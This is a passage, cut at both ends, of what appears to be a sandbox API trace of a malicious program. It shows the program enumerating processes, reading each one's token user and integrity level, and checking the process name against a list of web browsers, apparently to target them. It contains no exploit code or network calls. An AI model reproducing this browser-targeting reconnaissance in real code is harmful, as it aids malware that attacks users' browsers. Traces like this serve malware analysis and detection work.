(dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x188) returned 0x0 [0235.264] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1b0) returned 0x0 [0235.264] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0235.264] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e4) returned 0x0 [0235.264] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1ec) returned 0x0 [0235.265] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x258) returned 0x0 [0235.265] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x298) returned 0x0 [0235.265] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c8) returned 0x0 [0235.265] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x314) returned 0x0 [0235.265] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0 [0235.265] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0 [0235.265] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0235.265] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0235.265] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x160) returned 0x0 [0235.265] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x418) returned 0x0 [0235.265] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4dc) returned 0x0 [0235.265] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4e4) returned 0xb4 [0235.265] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0235.265] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0235.265] GetLastError () returned 0x7a [0235.265] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0235.265] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0235.265] CloseHandle (hObject=0xb8) returned 1 [0235.265] CloseHandle (hObject=0xb4) returned 1 [0235.265] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0235.265] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0235.265] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0235.265] GetLastError () returned 0x7a [0235.265] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0235.265] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0235.265] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0235.265] lstrcmpiW (lpString1="firefox.exe", lpString2="taskhost.exe") returned -1 [0235.265] lstrcmpiW (lpString1="chrome.exe", lpString2="taskhost.exe") returned -1 [0235.265] lstrcmpiW (lpString1="opera.exe", lpString2="taskhost.exe") returned -1 [0235.265] lstrcmpiW (lpString1="iexplore.exe", lpString2="taskhost.exe") returned -1 [0235.265] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="taskhost.exe") returned -1 [0235.265] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="taskhost.exe") returned -1 [0235.265] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x560) returned 0xb4 [0235.265] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0235.266] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0235.266] GetLastError () returned 0x7a [0235.266] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0235.266] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0235.266] CloseHandle (hObject=0xb8) returned 1 [0235.266] CloseHandle (hObject=0xb4) returned 1 [0235.266] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0235.266] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0235.266] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0235.266] GetLastError () returned 0x7a [0235.266] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0235.266] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0235.266] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0235.266] lstrcmpiW (lpString1="firefox.exe", lpString2="dwm.exe") returned 1 [0235.266] lstrcmpiW (lpString1="chrome.exe", lpString2="dwm.exe") returned -1 [0235.266] lstrcmpiW (lpString1="opera.exe", lpString2="dwm.exe") returned 1 [0235.266] lstrcmpiW (lpString1="iexplore.exe", lpString2="dwm.exe") returned 1 [0235.266] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="dwm.exe") returned 1 [0235.266] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="dwm.exe") returned 1 [0235.266] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x584) returned 0xb4 [0235.266] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0235.266] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0235.266] GetLastError () returned 0x7a [0235.266] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0235.266] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0235.266] CloseHandle (hObject=0xb8) returned 1 [0235.266] CloseHandle (hObject=0xb4) returned 1 [0235.266] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0235.266] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0235.266] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0235.266] GetLastError () returned 0x7a [0235.266] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0235.266] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0235.266] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0235.266] lstrcmpiW (lpString1="firefox.exe", lpString2="explorer.exe") returned 1 [0235.266] lstrcmpiW (lpString1="chrome.exe", lpString2="explorer.exe") returned -1 [0235.267] lstrcmpiW (lpString1="opera.exe", lpString2="explorer.exe") returned 1 [0235.267] lstrcmpiW (lpString1="iexplore.exe", lpString2="explorer.exe") returned 1 [0235.267] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="explorer.exe") returned 1 [0235.267] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="explorer.exe") returned 1 [0235.267] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0 [0235.267] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d0) returned 0x0 [0235.267] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6fc) returned 0xb4 [0235.267] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0235.267] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0235.267] GetLastError () returned 0x7a [0235.267] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0235.267] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0235.267] CloseHandle (hObject=0xb8) returned 1 [0235.267] CloseHandle (hObject=0xb4) returned 1 [0235.267] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0235.267] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0235.267] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0235.267] GetLastError () returned 0x7a [0235.267] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0235.267] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0235.267] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0235.267] lstrcmpiW (lpString1="firefox.exe", lpString2="ONENOTEM.EXE") returned -1 [0235.267] lstrcmpiW (lpString1="chrome.exe", lpString2="ONENOTEM.EXE") returned -1 [0235.267] lstrcmpiW (lpString1="opera.exe", lpString2="ONENOTEM.EXE") returned 1 [0235.267] lstrcmpiW (lpString1="iexplore.exe", lpString2="ONENOTEM.EXE") returned -1 [0235.267] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="ONENOTEM.EXE") returned -1 [0235.267] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="ONENOTEM.EXE") returned -1 [0235.267] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0xb4 [0235.267] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0235.267] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0235.267] GetLastError () returned 0x7a [0235.267] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0235.267] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0235.267] CloseHandle (hObject=0xb8) returned 1 [0235.267] CloseHandle (hObject=0xb4) returned 1 [0235.267] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0235.267] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0235.268] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0235.268] GetLastError () returned 0x7a [0235.268] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0235.268] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0235.268] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0235.268] lstrcmpiW (lpString1="firefox.exe", lpString2="undertake.exe") returned -1 [0235.268] lstrcmpiW (lpString1="chrome.exe", lpString2="undertake.exe") returned -1 [0235.268] lstrcmpiW (lpString1="opera.exe", lpString2="undertake.exe") returned -1 [0235.268] lstrcmpiW (lpString1="iexplore.exe", lpString2="undertake.exe") returned -1 [0235.268] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="undertake.exe") returned -1 [0235.268] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="undertake.exe") returned -1 [0235.268] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x118) returned 0xb4 [0235.268] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0235.268] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0235.268] GetLastError () returned 0x7a [0235.268] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0235.268] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0235.268] CloseHandle (hObject=0xb8) returned 1 [0235.268] CloseHandle (hObject=0xb4) returned 1 [0235.268] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0235.268] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0235.268] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0235.268] GetLastError () returned 0x7a [0235.268] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0235.268] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0235.268] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0235.268] lstrcmpiW (lpString1="firefox.exe", lpString2="luxury-westminster-editing-cube.exe") returned -1 [0235.268] lstrcmpiW (lpString1="chrome.exe", lpString2="luxury-westminster-editing-cube.exe") returned -1 [0235.268] lstrcmpiW (lpString1="opera.exe", lpString2="luxury-westminster-editing-cube.exe") returned 1 [0235.268] lstrcmpiW (lpString1="iexplore.exe", lpString2="luxury-westminster-editing-cube.exe") returned -1 [0235.268] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="luxury-westminster-editing-cube.exe") returned 1 [0235.268] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="luxury-westminster-editing-cube.exe") returned 1 [0235.268] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0xb4 [0235.268] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0235.268] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0235.268] GetLastError () returned 0x7a [0235.268] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0235.268] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0235.268] CloseHandle (hObject=0xb8) returned 1 [0235.269] CloseHandle (hObject=0xb4) returned 1 [0235.269] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0235.269] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0235.269] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0235.269] GetLastError () returned 0x7a [0235.269] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0235.269] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0235.269] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0235.269] lstrcmpiW (lpString1="firefox.exe", lpString2="devon stickers.exe") returned 1 [0235.269] lstrcmpiW (lpString1="chrome.exe", lpString2="devon stickers.exe") returned -1 [0235.269] lstrcmpiW (lpString1="opera.exe", lpString2="devon stickers.exe") returned 1 [0235.269] lstrcmpiW (lpString1="iexplore.exe", lpString2="devon stickers.exe") returned 1 [0235.269] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="devon stickers.exe") returned 1 [0235.269] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="devon stickers.exe") returned 1 [0235.269] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x724) returned 0xb4 [0235.269] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0235.269] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0235.269] GetLastError () returned 0x7a [0235.269] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0235.269] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0235.269] CloseHandle (hObject=0xb8) returned 1 [0235.269] CloseHandle (hObject=0xb4) returned 1 [0235.269] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0235.269] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0235.269] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0235.269] GetLastError () returned 0x7a [0235.269] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0235.269] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0235.269] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0235.269] lstrcmpiW (lpString1="firefox.exe", lpString2="eagles_podcast_type_marker.exe") returned 1 [0235.269] lstrcmpiW (lpString1="chrome.exe", lpString2="eagles_podcast_type_marker.exe") returned -1 [0235.269] lstrcmpiW (lpString1="opera.exe", lpString2="eagles_podcast_type_marker.exe") returned 1 [0235.269] lstrcmpiW (lpString1="iexplore.exe", lpString2="eagles_podcast_type_marker.exe") returned 1 [0235.269] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="eagles_podcast_type_marker.exe") returned 1 [0235.269] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="eagles_podcast_type_marker.exe") returned 1 [0235.269] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f4) returned 0xb4 [0235.269] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0235.269] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0235.269] GetLastError () returned 0x7a [0235.270] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0235.270] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0235.270] CloseHandle (hObject=0xb8) returned 1 [0235.270] CloseHandle (hObject=0xb4) returned 1 [0235.270] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, 